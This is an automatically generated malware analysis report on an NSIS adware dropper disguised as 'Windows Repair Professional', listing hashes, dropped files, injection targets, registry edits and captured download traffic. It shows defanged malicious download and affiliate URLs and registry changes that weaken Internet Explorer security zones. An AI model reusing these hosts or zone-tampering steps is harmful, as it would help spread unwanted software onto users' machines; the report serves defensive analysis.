Trojan.NSIS.StartPage_def705210c

by malwarelabrobot on August 14th, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.AdLoad.erjk (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: def705210ccd222720617c001d355d6e
SHA1: e10afc3fb2fa17020df1dc07a1f2a60f5630c6af
SHA256: 5373f1ef8512636223fc658a30724f696cf471cccf354cf4d73f4007d6a9b163
SSDeep: 12288:ydOv5jKhsfoPA yeVKUCUxP4C902bdRtJJPipFT6sEUigDkJ:ydq5TfcdHj4fmbCynEkJ
Size: 606131 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: OXQCN
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

NojM0TDHJX.exe:1980
%original file name%.exe:1616
cpSetup.exe:568

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process NojM0TDHJX.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (0 bytes)

The process %original file name%.exe:1616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)

The process cpSetup.exe:568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (0 bytes)

Registry activity

The process NojM0TDHJX.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 64 0C 52 E7 45 47 39 B5 A1 0E DB 47 CB 74 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 EC 84 9D 20 C2 B7 54 FE 10 CF EE 5B 8C DB 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 05 05 B2 D0 2E A7 87 C1 BB E1 4E E3 6B C7 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
8ec3a46db0f5d311571b3c0c62dc0d05 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00074d91.a
e8f5383b782fee176aff1ff243f1f501 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00075542.a
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NSISdl.dll
905d7368f8c25e0b12e6c5c1e036e7b7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll
33ec04738007e665059cf40bc0f0c22b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\BgWorker.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\System.dll
30741f682e9d12149beb9266fb790426 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\cpSetup.exe
6206b94f91e92b7f7f72214c438dd414 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsArray.dll
c10e04dd4ad4277d5adc951bb331c777 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsDialogs.dll
0309822592797cc6d1052d2735f20065 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 45048 45056 2.26212 5fffcf2497e851763fd62f4eee795079

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA 52.17.177.26
hxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA 54.239.168.162
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA 54.239.168.162
hxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA 54.88.21.193
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 54.239.168.162
hxxp://get.fc-gosh.biz/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe 54.239.168.254
hxxp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial 54.239.168.173
hxxp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 54.239.168.42
hxxp://tap.winre.xyz/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 54.239.168.70


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake FireFox Version 2.

Traffic

GET hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 409128
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:51 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3AgamjltkJULGHtW2r49AY2gNqm91hyzrbUxeYApaBL7338gzXHjPw==

<<< skipped >>>

GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 13 Aug 2015 00:45:52 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02414-102e22fe3dd0a0bd118638fce028d4-1006-4-0-0-0-0-UA-2-3131-373335-34323732313332-30-30-30-193.138.244.231-20150812204552-_-7B11052C012208017E2C3146051A2D427132034F4D51525A1C494616244946210D1A4E041130124B55; expires=Sat, 12 Sep 2015 00:45:52 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 07 Jul 2018 11:25:52 GMT; path=/;
tracking_id: 102e22fe3dd0a0bd118638fce028d4
X-Robots-Tag: noindex, nofollow
Content-Length: 324
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>.<head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA">here</a>.</p>.</body></html>...

<<< skipped >>>

POST hXXp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp2-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57

HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 13 Aug 2015 00:45:50 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Length Required</h2>..<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>..</BODY></HTML>....


GET hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 28712
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CHp6udWsvm6AJ4HQDfzA_lXU5e5L8IiqwlpdvQBL11cRTsy-wygohQ==

<<< skipped >>>

GET /stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial HTTP/1.0
Host: dl.fripp54.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76885
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55cbe8acafcad.exe"
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 00:45:33 GMT
X-Cache: Miss from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: z8nqj6gQgmuWKT9oAIJTJr8kmfMfy_E9gLa5dRx5WTeY2Vba9TMkZg==

<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 HTTP/1.0
Host: tap.winre.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2322
Connection: close
Date: Thu, 13 Aug 2015 00:45:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e2PKLPDCLOe9qGBiUN-s8dMvvEQm5jyb7gjuvI2-p-s-0xCQqXSOzg==
files=4.t1=dl.u1=hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%2
520Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSe
tup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.
m1=0.d1=0.t2=dl.u2=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&af
filiateid=1780&productname=Windows%20Repair%20Professional%20%
28A&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-s
etup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/
pe/szip_pub.png&productversion=9.20&producteula=http://sevenzi
p.info/terms.html&productsize=1.06MB&productcmd=s&publishercontac
t=http://sevenzip.info&productbusiness=sd,se,ad,co,prm%2
Cwsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132.n2=
SevenZip-apset.exe.b2=ap.c2=sevenzip.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://b.
byteguardoptic.com/de/?q=YWZmaWxpYXRlX2lkPTczNS00MjcyMTMyJmZpbGVzaXplP
TIuNE1iJnB1Ymxpc2hlcklkPTI0NDM3JnByb2R1Y3RfbmFtZT1XaW5kb3dzJTIwUmVwYWl
yJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF90aXRsZT1XaW5kb3dzJTIwUmVwYWlyJ
TIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF9kb3dubG9hZF91cmw9aHR0cCUzYSUyZiU
yZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZ
XhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25
hbWU9c2V0dXA=.n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d3=0.t
4=dl.u4=hXXp://get.file136desktop.info/DownloadManager/Get?p=638&d=544
&l=461&n=1&productname=sevenzip&d1=4272132&d2=735&dynamicname=Windows%
2520Repair%20Professional%20%28A.n4=setup-1228.exe.b4=ru.c4=

<<< skipped >>>

GET /launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe HTTP/1.0
Host: get.fc-gosh.biz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 179
Connection: close
Date: Thu, 13 Aug 2015 00:45:43 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6QMHXEHuHyMgYmFpY2cxVQprTEKUWi9cTaXED_52oB9UA-kWfyWXOA==
s=first..u=hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial..


GET /?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.cp-retr.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 52212
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Thu, 13 Aug 2015 00:45:47 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qGMncVdA41NlISK5tz1w3zzoOgUy1l5m5tOFRCo78IYhdCrny4lkfQ==

<<< skipped >>>

POST hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57

HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 13 Aug 2015 00:45:54 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 3abf650c7bf73e47515000bddf3f05c0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..


The Trojan connects to the servers at the following location(s):

%original file name%.exe_1616:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
ogram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
